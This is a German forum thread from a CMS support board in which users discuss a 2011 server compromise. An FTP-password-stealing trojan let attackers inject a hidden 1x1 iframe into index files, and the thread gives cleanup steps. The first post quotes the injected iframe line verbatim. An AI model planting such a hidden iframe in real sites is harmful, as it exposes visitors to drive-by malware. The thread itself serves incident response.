Forum

Moderiert von: stefan, spinne
Forum Index
Support
     OPN und andere CMS
     Server Hack
 

Seite 1 2 nächste Seite 


Autor Server Hack
spinne
Registriert: 21.08.2003
Wohnort: Luzern


Sende eine Private Nachricht an spinne Besuche die Homepage von spinne
Geschrieben: 25.01.2011 18:14

Sali zusammen

Hab heut einen User im Chat gehabt, bei dem der Server gehackt worden ist. Bei ihm sind in sämtlichen index.php Dateien folgendes eingebaut worden:
?<html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>>

die Infizierung macht sich durch folgende Fehlermeldung bemerkbar:
Beispiel:
Parse error: syntax error, unexpected '?' in xxxxxx/opn/system/user_birthday/plugin/autostart/index.php on line 92

In diesem Fall sollte man alle Datein löschen und OPN Neu hochladen. Sicherung des Caches, eigene Bilder und Anpassungen sollte auf jeden Fall vorher gemacht worden sein. Auch die mainfile auf jeden Fall vorher sichern.




Übe Dich in Geduld, wenn Du etwas erreichen willst
-----------------------------------------------------------------------------------------
Geheime Gedanken -- Mein Spinnennetz -- Spinnennetz CH -- RenderWorld Cinema4d

Testbereiche, nachgeschaut und dann nachgefragt:
OPN-Laborcenter --- OPN-Themes --- OPN-Bugtracking --- OPN-Doku --- OPN-FAQ


Zitieren nach oben
Flash
Registriert: 20.08.2001
Beiträge: 1707
Wohnort: Luzern


Sende eine Private Nachricht an Flash Besuche die Homepage von Flash
ICQ
Geschrieben: 26.01.2011 10:07

Bei dem Hack handelt es sich nicht um eine Sicherheitslücke von OPN.

Das ganze passiert direkt über den FTP Zugang. Der jeweilige User hat auf seinem Rechnern einen Trojaner, welcher die FTP Passwörter von Filezilla und WS FTP ausliest. Mit diesem Zugang wir dann über ein Bot allen index.php, index.html Datein ein iframe eingeschleusst.

Gemäss Recherche im Internet ist der Trojaner nicht neu. Er nutzt nur neue sowie auch alte Sicherheichtslücken auf dem lokalen Rechner.

So zum Beispiel mit PDF Dateien, welchen den Schädling aus dem Netz laden. (Im Adobe Reader Javacript ausschalten)

Achtung:
Es langt nicht einfach die FTP Zugangsdaten zu ändern. Solange der Rechner nicht sauber ist, wird das Tool immer wieder an die Passwörter kommen.

Rechner zum Beispiel mit diesem Tool hier prüfen:
http://www.malwarebytes.org/


Mehr Infos zu diesem Trojaner findet ihr bei http://www.trojaner-board.de


Flash






F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm




OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz ---
Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal




[ Diese Nachricht wurde bearbeitet von: Flash am 26.01.2011 10:14 (Originaldatum 26.01.2011 10:07) ]

Zitieren nach oben
darksweetys
Registriert: 28.12.2005
Beiträge: 639


Sende eine Private Nachricht an darksweetys Besuche die Homepage von darksweetys
MSNM
Geschrieben: 11.02.2011 13:52

Also mich hats nun auch erwischt.  Lade OPN grad neu hoch, allerdings der Cache ist ja auch befallen. Kommt man dann überhaupt über eine komplette Neuinstallation herum?



DarkSweetys

Zitieren nach oben
Flash
Registriert: 20.08.2001
Beiträge: 1707
Wohnort: Luzern


Sende eine Private Nachricht an Flash Besuche die Homepage von Flash
ICQ
Geschrieben: 11.02.2011 14:03

Hallo André

Kommt man dann überhaupt über eine komplette Neuinstallation herum?


ja, du musst OPN nicht neue installieren.

Es müssen alle index.php und index.html Dateien ersetzt werden.

Vorgehen:
- das eigene Theme sichern
- alle Cache Ordner sichern
- alle eigenen GIF's etc aus dem Ordner /images und default_images sichern
- mainfile.php sichern
- htaccess sichern

Alle Files auf dem Server löschen

- eigene Themes prüfen und den Schadcode entfernen
- im cache Ordner alle index.html Dateien ersetzen

Upload:
- neues OPN hochladen
- alte mainfile hochladen
- eigenes sauberes Theme hochladen
- cache hochladen

Danach sollte der Fehler behoben sein

Flash











F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm




OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz ---
Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal




Zitieren nach oben
darksweetys
Registriert: 28.12.2005
Beiträge: 639


Sende eine Private Nachricht an darksweetys Besuche die Homepage von darksweetys
MSNM
Geschrieben: 11.02.2011 15:18

So, ich hoffe es reicht diese eine Zeile Code zu entfernen. Zum Glück wurde der own_language Ordner im Cache nicht befallen, denn da sind haufenweise index-Datein. Warscheinlich arbeitet der Trojaner bis in eine gewisse Strukturtiefe.



DarkSweetys

[ Diese Nachricht wurde bearbeitet von: darksweetys am 11.02.2011 15:57 (Originaldatum 11.02.2011 15:18) ]

Zitieren nach oben
Scout_GP

Registriert: 16.06.2005
Beiträge: 1054
Wohnort: Berlin


Sende eine Private Nachricht an Scout_GP Besuche die Homepage von Scout_GP
Geschrieben: 11.02.2011 16:03

Wie heißt das Teil denn?



Gruß Scout
+++ Last.fm | Scoutweb +++

Zitieren nach oben
darksweetys
Registriert: 28.12.2005
Beiträge: 639


Sende eine Private Nachricht an darksweetys Besuche die Homepage von darksweetys
MSNM
Geschrieben: 11.02.2011 16:21

Irgendetwas mit Script:Iframer. Es scheint wirklich so zu sein wie Rolf es beschrieben hat. Ich hab dummerweise nicht mit der aktuellen Version von Filezilla gearbeitet.



DarkSweetys

Zitieren nach oben
Flash
Registriert: 20.08.2001
Beiträge: 1707
Wohnort: Luzern


Sende eine Private Nachricht an Flash Besuche die Homepage von Flash
ICQ
Geschrieben: 11.02.2011 16:37

Durchsuche deinen Rechner nach der Datei portwexexe
Das könnte der Übeltäter sein.
Im Weiteren vermute ich, dass ein Trojaner auf dem Rechner an die FTP Passwörter ran kommt.

Beim erste Fall wo wir hier hatten haben ich das FTP Login Protokoll gesehen. Darin ist ganz klar deutlich zu sehen, dass von ausserhalb per FTP eingeloggt wurde.
Ich vermute daher schwer, dass ein lokaler Trojaner die Daten aus dem Filezilla auslesen kann und dann verbreitet.
Im Netz findet man viele User die genau dasselbe Problem haben. Egal ob OPN, Joomla, WordPress oder was weis ich installiert war.

Von daher ist es keine Sicherheitslücke in der Anwendung.

Achtung:
Das eingebundene IFRAME hat verschiedenen URL's.
Durchsucht also die Seiten generell nach IFRAME


Flash






F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm




OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz ---
Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal




Zitieren nach oben
darksweetys
Registriert: 28.12.2005
Beiträge: 639


Sende eine Private Nachricht an darksweetys Besuche die Homepage von darksweetys
MSNM
Geschrieben: 11.02.2011 18:19

Die portwexexe hab ich zwar nicht aber das hat nichts zu sagen vermute ich. Trojaner findet mein Antivirenprogramm immerwieder einmal.

Gibt es Möglichkeiten FTP-Programme aus einer sicheren Umgebung zu starten?



DarkSweetys

Zitieren nach oben
Scout_GP

Registriert: 16.06.2005
Beiträge: 1054
Wohnort: Berlin


Sende eine Private Nachricht an Scout_GP Besuche die Homepage von Scout_GP
Geschrieben: 11.02.2011 20:24

Also ich scheine nichts weiter zu haben. Benutze aber auch kein FTP Programm, kein Filezilla etc.


Gibt es Möglichkeiten FTP-Programme aus einer sicheren Umgebung zu starten?


Ich nutze seid einiger Zeit KeySrambler. Mit Sandboxiekann man auch arbeiten.



Gruß Scout
+++ Last.fm | Scoutweb +++

Zitieren nach oben
sortieren nach
Seite 1 2 nächste Seite 

 
Vorheriges Thema:  Umzug von e107 zu OPN
Nächstes Thema:  OPN braucht den Vergleich nicht zu scheuen...

Gehe zu: